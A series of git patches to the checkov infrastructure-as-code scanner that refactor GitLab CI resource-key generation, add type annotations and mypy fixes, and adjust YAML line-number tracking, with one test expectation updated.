00:00:00 2001 From: Eliran Turgeman Date: Thu, 20 Oct 2022 12:31:36 +0300 Subject: [PATCH 07/12] typing --- checkov/gitlab_ci/runner.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py index 3333687b4ea..9a2c42d40e3 100644 --- a/checkov/gitlab_ci/runner.py +++ b/checkov/gitlab_ci/runner.py @@ -48,7 +48,8 @@ def included_paths(self) -> Iterable[str]: def get_resource(self, file_path: str, key: str, supported_entities: Iterable[str], definitions: dict[str, Any] | None = None) -> str: start_line, end_line = Runner.get_start_and_end_lines(key) - resource_id: str = generate_resource_key_recursive(self.definitions[file_path], '', start_line, end_line) + file_config: dict[str, Any] = self.definitions[file_path] + resource_id: str = generate_resource_key_recursive(file_config, '', start_line, end_line) return resource_id def run( From e086250fde34480f3227fb9edcb1a6647f0251b4 Mon Sep 17 00:00:00 2001 From: Eliran Turgeman Date: Thu, 20 Oct 2022 12:37:56 +0300 Subject: [PATCH 08/12] fix tests --- tests/gitlab_ci/test_resource_names.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/gitlab_ci/test_resource_names.py b/tests/gitlab_ci/test_resource_names.py index cff69e19735..e86ec47df13 100644 --- a/tests/gitlab_ci/test_resource_names.py +++ b/tests/gitlab_ci/test_resource_names.py @@ -9,7 +9,7 @@ ('*.script[].*.script[].CKV_GITLABCI_1[19:19]', '/checkov/tests/gitlab_ci/resources/images/.gitlab-ci.yml', 'test.script'), ('*.rules.*.rules.CKV_GITLABCI_2[7:9]', '/checkov/tests/gitlab_ci/resources/two/.gitlab-ci.yml', - 'planOnlySubset.rules'), + 'planOnlySubset'), ], ) def test_get_resource(key, file_path, expected_key, definitions): From 767a4037c9ee358dfcc42b85bd8b90d56b23cabc Mon Sep 17 00:00:00 2001 From: Eliran Turgeman Date: Thu, 20 Oct 2022 12:46:53 +0300 Subject: [PATCH 09/12] mypy --- checkov/gitlab_ci/runner.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py index 9a2c42d40e3..44e16eaffd3 100644 --- a/checkov/gitlab_ci/runner.py +++ b/checkov/gitlab_ci/runner.py @@ -4,6 +4,7 @@ from typing import TYPE_CHECKING, Any from checkov.common.output.report import Report +from checkov.common.util.type_forcers import force_dict from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive from checkov.runner_filter import RunnerFilter @@ -48,7 +49,9 @@ def included_paths(self) -> Iterable[str]: def get_resource(self, file_path: str, key: str, supported_entities: Iterable[str], definitions: dict[str, Any] | None = None) -> str: start_line, end_line = Runner.get_start_and_end_lines(key) - file_config: dict[str, Any] = self.definitions[file_path] + file_config: dict[str, Any] = force_dict(self.definitions[file_path]) + if not file_config: + return key resource_id: str = generate_resource_key_recursive(file_config, '', start_line, end_line) return resource_id From 26defd56469bfb74226a918df8e066517b809eb5 Mon Sep 17 00:00:00 2001 From: Eliran Turgeman Date: Thu, 20 Oct 2022 12:51:01 +0300 Subject: [PATCH 10/12] mypy --- checkov/gitlab_ci/runner.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py index 44e16eaffd3..a97ffb56b0d 100644 --- a/checkov/gitlab_ci/runner.py +++ b/checkov/gitlab_ci/runner.py @@ -49,7 +49,7 @@ def included_paths(self) -> Iterable[str]: def get_resource(self, file_path: str, key: str, supported_entities: Iterable[str], definitions: dict[str, Any] | None = None) -> str: start_line, end_line = Runner.get_start_and_end_lines(key) - file_config: dict[str, Any] = force_dict(self.definitions[file_path]) + file_config: dict[str, Any] | None = force_dict(self.definitions[file_path]) if not file_config: return key resource_id: str = generate_resource_key_recursive(file_config, '', start_line, end_line) From c6da80c8de77117098247274355030687f6a3f3b Mon Sep 17 00:00:00 2001 From: Eliran Turgeman Date: Sun, 23 Oct 2022 12:21:47 +0300 Subject: [PATCH 11/12] review changes --- checkov/common/checks/base_check_registry.py | 3 --- checkov/common/runners/object_runner.py | 2 +- checkov/gitlab_ci/common/resource_id_utils.py | 3 ++- .../gitlab_ci/image_referencer/provider.py | 11 ++++++---- checkov/gitlab_ci/runner.py | 15 +++++++------ checkov/yaml_doc/base_registry.py | 21 ++++++++++--------- 6 files changed, 28 insertions(+), 27 deletions(-) diff --git a/checkov/common/checks/base_check_registry.py b/checkov/common/checks/base_check_registry.py index 344d67a77f1..1ed2700f449 100644 --- a/checkov/common/checks/base_check_registry.py +++ b/checkov/common/checks/base_check_registry.py @@ -197,6 +197,3 @@ def load_external_checks(self, directory: str) -> None: self.logger.error(f"Cannot load external check '{check_name}' from {check_full_path}", exc_info=True) finally: BaseCheckRegistry.__loading_external_checks = False - - def set_definitions_raw(self, definitions_raw: list[tuple[int, str]]) -> None: - self.definitions_raw = definitions_raw diff --git a/checkov/common/runners/object_runner.py b/checkov/common/runners/object_runner.py index 73478a5c6c0..e5d2bc1e85d 100644 --- a/checkov/common/runners/object_runner.py +++ b/checkov/common/runners/object_runner.py @@ -102,7 +102,7 @@ def run( skipped_checks = collect_suppressions_for_context(self.definitions_raw[file_path]) if registry.report_type == CheckType.GITLAB_CI: - registry.set_definitions_raw(self.definitions_raw[file_path]) + registry.definitions_raw = self.definitions_raw[file_path] results = registry.scan(file_path, self.definitions[file_path], skipped_checks, runner_filter) # type:ignore[arg-type] # this is overridden in the subclass for key, result in results.items(): result_config = result["results_configuration"] diff --git a/checkov/gitlab_ci/common/resource_id_utils.py b/checkov/gitlab_ci/common/resource_id_utils.py index 8a0db1e8d45..790c5cb3d73 100644 --- a/checkov/gitlab_ci/common/resource_id_utils.py +++ b/checkov/gitlab_ci/common/resource_id_utils.py @@ -11,7 +11,8 @@ def generate_resource_key_recursive(conf: dict[str, Any] | list[str] | str, key: for k, value in conf.items(): if isinstance(value, dict) and value[START_LINE] <= start_line <= end_line <= value[END_LINE]: - return generate_resource_key_recursive(value, f'{key}.{k}' if key else k, start_line, end_line) + next_key = f'{key}.{k}' if key else k + return generate_resource_key_recursive(value, next_key, start_line, end_line) if isinstance(value, list): return f'{key}.{k}' if key else k if isinstance(value, str): diff --git a/checkov/gitlab_ci/image_referencer/provider.py b/checkov/gitlab_ci/image_referencer/provider.py index b1d7c9a333b..f5d2cd13848 100644 --- a/checkov/gitlab_ci/image_referencer/provider.py +++ b/checkov/gitlab_ci/image_referencer/provider.py @@ -44,8 +44,10 @@ def extract_images_from_workflow(self) -> list[Image]: name=image_name, start_line=start_line, end_line=end_line, - related_resource_id=generate_resource_key_recursive(self.workflow_config, '', - start_line, end_line) + related_resource_id=generate_resource_key_recursive(conf=self.workflow_config, + key='', + start_line=start_line, + end_line=end_line) ) images.append(image_obj) image_name = "" @@ -55,8 +57,9 @@ def extract_images_from_workflow(self) -> list[Image]: name=image_name, start_line=start_line, end_line=end_line, - related_resource_id=generate_resource_key_recursive(self.workflow_config, '', - start_line, end_line) + related_resource_id=generate_resource_key_recursive(conf=self.workflow_config, + key='', start_line=start_line, + end_line=end_line) ) images.append(image_obj) return images diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py index a97ffb56b0d..23852e50728 100644 --- a/checkov/gitlab_ci/runner.py +++ b/checkov/gitlab_ci/runner.py @@ -49,10 +49,11 @@ def included_paths(self) -> Iterable[str]: def get_resource(self, file_path: str, key: str, supported_entities: Iterable[str], definitions: dict[str, Any] | None = None) -> str: start_line, end_line = Runner.get_start_and_end_lines(key) - file_config: dict[str, Any] | None = force_dict(self.definitions[file_path]) + file_config = force_dict(self.definitions[file_path]) if not file_config: return key - resource_id: str = generate_resource_key_recursive(file_config, '', start_line, end_line) + resource_id: str = generate_resource_key_recursive(conf=file_config, key='', start_line=start_line, + end_line=end_line) return resource_id def run( @@ -105,11 +106,9 @@ def extract_images( @staticmethod def get_start_and_end_lines(key: str) -> list[int]: check_name = key.split('.')[-1] - try: - start_end_line_bracket_index = check_name.index('[') - closing_bracket_index = check_name.index(']') - if closing_bracket_index - start_end_line_bracket_index == 1: - return [-1, -1] - except ValueError: + if "[" not in check_name or "[]" in check_name: return [-1, -1] + + start_end_line_bracket_index = check_name.index('[') + return [int(x) for x in check_name[start_end_line_bracket_index + 1: len(check_name) - 1].split(':')] diff --git a/checkov/yaml_doc/base_registry.py b/checkov/yaml_doc/base_registry.py index 10eb968e614..212c8368808 100644 --- a/checkov/yaml_doc/base_registry.py +++ b/checkov/yaml_doc/base_registry.py @@ -44,13 +44,12 @@ def _scan_yaml_array( ) if isinstance(analyzed_entities, list): for item in analyzed_entities: - item_dict = item if isinstance(item, str): - item_dict = self.set_lines_for_item(item) + item = self.set_lines_for_item(item) if STARTLINE_MARK != item and ENDLINE_MARK != item: self.update_result( check, - item_dict, + item, entity_type, entity_type, results, @@ -262,20 +261,22 @@ def set_lines_for_item(self, item: str) -> dict[int | str, str | int] | str: return item item_lines = item.rstrip().split("\n") - first_line, last_line = item_lines[0], item_lines[-1] - - is_single_line = True if len(item_lines) == 1 else False - item_dict: dict[int | str, str | int] = { idx: line for idx, line in enumerate(item_lines) } + if len(item_lines) == 1: + item_line = item_lines[0] + for idx, line in self.definitions_raw: + if item_line in line: + item_dict[STARTLINE_MARK] = idx + item_dict[ENDLINE_MARK] = idx + + first_line, last_line = item_lines[0], item_lines[-1] for idx, line in self.definitions_raw: if first_line in line: item_dict[STARTLINE_MARK] = idx - if is_single_line: - item_dict[ENDLINE_MARK] = idx - break + continue if last_line in line: item_dict[ENDLINE_MARK] = idx From 85a052cb0e48ca2267f9e058fb5ace27fbf5e015 Mon Sep 17 00:00:00 2001 From: Eliran Turgeman Date: Sun, 23 Oct 2022 17:39:49 +0300 Subject: [PATCH 12/12] review changes --- checkov/yaml_doc/base_registry.py | 1 + 1 file changed, 1 insertion(+) diff --git a/checkov/yaml_doc/base_registry.py b/checkov/yaml_doc/base_registry.py index 212c8368808..ea4d11bbfaa 100644 --- a/checkov/yaml_doc/base_registry.py +++ b/checkov/yaml_doc/base_registry.py @@ -271,6 +271,7 @@ def set_lines_for_item(self, item: str) -> dict[int | str, str | int] | str: if item_line in line: item_dict[STARTLINE_MARK] = idx item_dict[ENDLINE_MARK] = idx + return item_dict first_line, last_line = item_lines[0], item_lines[-1] for idx, line in self.definitions_raw: